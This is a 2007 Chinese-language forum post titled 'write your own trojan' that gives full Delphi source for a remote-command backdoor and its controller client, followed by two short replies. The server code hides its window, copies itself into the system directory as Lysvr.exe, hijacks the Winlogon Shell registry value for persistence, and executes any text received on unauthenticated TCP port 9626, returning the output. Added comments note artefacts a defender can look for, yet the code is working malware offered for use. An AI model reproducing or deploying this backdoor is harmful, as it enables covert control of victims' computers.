標題: 寫自己的木馬@@
小軒 (懦夫, 做左唔敢認._.)
發表於 2007-11-25 20:03  資料 文集 短消息 
寫自己的木馬@@

程式跟傳統木馬一樣,分服務端和用戶端。運行服務端後會複製自身到SYSTEM32目錄下面,並在註冊表添加一個自動啟動項,打開本機9626埠開始等待接收用戶端的資料。當接收到用戶端資料時就當作CMD命令去執行,最後把回顯傳送回用戶端。用戶端很簡單,跟服務端連接成功後,輸入命令點執行,正常的話可以收到服務端的執行結果了。  



  源碼如下:

QUOTE:
////Server.pas//////////////

unit UtMain;

////////////////////////////////////
//////////BY SiuHin@GundamHK////////////////
////////Email:[email protected]////
///部分代碼從網上收集///////////
////////////////////////////////

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, Registry, ScktComp, StdCtrls;

type
// Server-side form. It is never shown (see FormCreate); it exists only to
// host the listening TServerSocket and a TMemo that is used as a scratch
// buffer for captured child-process output.
TFmMain = class(TForm)
SS: TServerSocket;   // listening socket; port is set in FormCreate
Memo1: TMemo;        // accumulates child stdout before it is sent back to the peer
procedure FormCreate(Sender: TObject);                              // persistence, self-copy, start listener
procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);      // fixed greeting on every new connection
procedure SSClientRead(Sender: TObject; Socket: TCustomWinSocket);  // executes received text as a command line
private
{ Private declarations }
public
{ Public declarations }
end;

var
FmMain: TFmMain;   // the (hidden) main form instance
reg:TRegistry;     // global registry object; created and freed inside FormCreate only

implementation

{$R *.dfm}

// Runs once at startup. Hides the form, writes a persistence entry, drops a
// copy of the executable into the system directory and opens the listener.
// Host artefacts visible in this code that a defender can look for:
//   HKLM\SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon, value "Shell"
//   set to 'Explorer.exe Lysvr.exe'; a file named Lysvr.exe in the system
//   directory; a process listening on TCP port 9626.
procedure TFmMain.FormCreate(Sender: TObject);
var
sysdir:array[0..50] of char;   // receives the system directory path (50 passed as the buffer size)
begin
Application.ShowMainForm:=False;
FmMain.Left:=-200;     // runs without showing a window (form parked off-screen)
// Persistence: sets the Winlogon "Shell" value so Lysvr.exe is launched along
// with Explorer at logon. Writing under HKLM normally needs administrative
// rights; there is no exception handling around these registry calls.
reg:=TRegistry.Create;
reg.RootKey:=HKEY_LOCAL_MACHINE;
reg.OpenKey('SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon',true);   // true: create the key if it does not exist
if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then
reg.WriteString('Shell','Explorer.exe Lysvr.exe');   // create the boot-time autostart entry
reg.Free;
// Self-copy under a fixed name in the system directory, only if not already present.
GetSystemDirectory(sysdir,50);
if not FileExists(sysdir+'\Lysvr.exe') then
copyfile(Pchar(Application.exeName),pchar(sysdir+'\Lysvr.exe'),true);

// Listener on a fixed port. No authentication: any peer that connects is
// accepted. A failure to bind is swallowed by the empty except block.
SS.Port:=9626;
try
SS.Active:=True;
except
end;
end;

// Fired when a client connects. Replies with a fixed greeting ('連接成功',
// "connection succeeded"); no peer check or authentication happens here.
procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
begin
Socket.SendText('連接成功');   // send 'connection succeeded' whenever a connection is detected
end;

// Fired when data arrives from a connected client. The received text is used
// verbatim as the command line for CreateProcess, the child's stdout is
// drained through an anonymous pipe into Memo1, and Memo1's text is sent back.
// Nothing restricts which peer may send or what may be executed, and the
// command runs with the privileges of this process.
procedure TFmMain.SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
var
RemoteCmd:string;               // raw text received from the client
hReadPipe,hWritePipe:THandle;   // anonymous pipe: child writes, this procedure reads
si:STARTUPINFO;
lsa:SECURITY_ATTRIBUTES;        // makes the pipe handles inheritable by the child
pi:PROCESS_INFORMATION;
cchReadBuffer:DWORD;            // bytes available (PeekNamedPipe) / bytes read (ReadFile)
ph:PChar;                       // 5000-byte output buffer
fname:PChar;                    // 255-byte copy of the command line handed to CreateProcess
res:string;                     // not used in this procedure
begin
Memo1.Clear;
remotecmd:=Socket.ReceiveText;
fname:=allocmem(255);
ph:=AllocMem(5000);
lsa.nLength :=sizeof(SECURITY_ATTRIBUTES);
lsa.lpSecurityDescriptor :=nil;
lsa.bInheritHandle :=True;   // the child must inherit the pipe's write end
if CreatePipe(hReadPipe,hWritePipe,@lsa,0)=false then
begin
socket.SendText('不能創建管道');   // 'cannot create pipe'
exit;
end;
fillchar(si,sizeof(STARTUPINFO),0);
si.cb:=sizeof(STARTUPINFO);
si.dwFlags:=(STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW);
si.wShowWindow:=SW_HIDE;       // child window is hidden
si.hStdOutput:=hWritePipe;     // child stdout goes into the pipe
StrPCopy(fname,remotecmd);
// Execute the received text as a command line.
if CreateProcess(nil,fname,nil,nil,true,0,nil,nil,si,pi)=False then
begin
socket.SendText('不能創建進程');   // 'cannot create process'
FreeMem(ph);
FreeMem(fname);
Exit;
end;
// Poll the pipe every 100 ms, appending each chunk to Memo1, until the child
// has exited and no more data is pending.
while(true) do
begin
if not PeekNamedPipe(hReadPipe,ph,1,@cchReadBuffer,nil,nil) then break;
if cchReadBuffer<>0 then
begin
if ReadFile(hReadPipe,ph^,4096,cchReadBuffer,nil)=false then break;
ph[cchReadbuffer]:=chr(0);   // NUL-terminate what was just read
Memo1.Lines.Add(ph);
end
else
if(WaitForSingleObject(pi.hProcess ,0)=WAIT_OBJECT_0) then break;   // child exited, pipe empty
Sleep(100);
end;
ph[cchReadBuffer]:=chr(0);
Memo1.Lines.Add(ph);   // Memo1 receives the echoed output
CloseHandle(hReadPipe);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
CloseHandle(hWritePipe);
FreeMem(ph);
FreeMem(fname);
socket.SendText(Memo1.Text); // send the captured output back to the client
end;

end.

///////////////////////////////////////////////////////////////////////////////////////////

//////用戶端/////////////////////

unit UtMain;

////////////////////////////////////
//////////BY lanyus////////////////
////////Email:[email protected]////
////////QQ:231221////////////////
////////////////////////////////

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, OleCtrls, SHDocVw, StdCtrls, IdBaseComponent, IdComponent,
IdUDPBase, IdUDPServer, Buttons, TLHelp32, ScktComp;

type
// Controller-side form: a thin TClientSocket front end. Edit2/Edit3 hold the
// host and port, Edit4 the text to send, and Memo1 displays whatever the peer
// returns. WebBrowser1 and Label3..Label5 are not referenced by the code in
// this unit.
TFmMain = class(TForm)
WebBrowser1: TWebBrowser;
Label3: TLabel;
Edit2: TEdit;        // host
Label4: TLabel;
Edit3: TEdit;        // port (parsed with StrToInt)
Button2: TButton;    // connect
CS: TClientSocket;
Edit4: TEdit;        // text to send
Label5: TLabel;
Memo1: TMemo;        // received text
BitBtn2: TBitBtn;    // send
procedure Button2Click(Sender: TObject);
procedure CSRead(Sender: TObject; Socket: TCustomWinSocket);
procedure BitBtn2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
FmMain: TFmMain;   // the controller form instance

implementation

{$R *.dfm}

// Connect button: opens a TCP connection to the host and port typed into
// Edit2 and Edit3. StrToInt raises EConvertError if Edit3 is not an integer;
// nothing here catches it.
procedure TFmMain.Button2Click(Sender: TObject);
begin
CS.Host:=Edit2.Text;
CS.Port:=StrToInt(Edit3.Text);
CS.Open;
end;

// Fired when the peer sends data: replaces Memo1's contents with the text
// received in this read, followed by one blank line.
procedure TFmMain.CSRead(Sender: TObject; Socket: TCustomWinSocket);
begin
Memo1.Clear;
Memo1.Lines.Add(Socket.ReceiveText);
Memo1.Lines.Add('');   // trailing blank line
end;

// Send button: transmits the contents of Edit4 to the connected peer as-is.
procedure TFmMain.BitBtn2Click(Sender: TObject);
begin
CS.Socket.SendText(edit4.Text);
end;

end.



ZetA-ChaR
發表於 2007-12-12 23:31  資料 短消息 
尼個係delphi?




小軒 (懦夫, 做左唔敢認._.)
發表於 2007-12-25 15:52  資料 文集 短消息 


QUOTE:
原帖由 ZetA-ChaR 於 2007-12-12 23:31 發表
尼個係delphi?

你覺得呢@w@

 



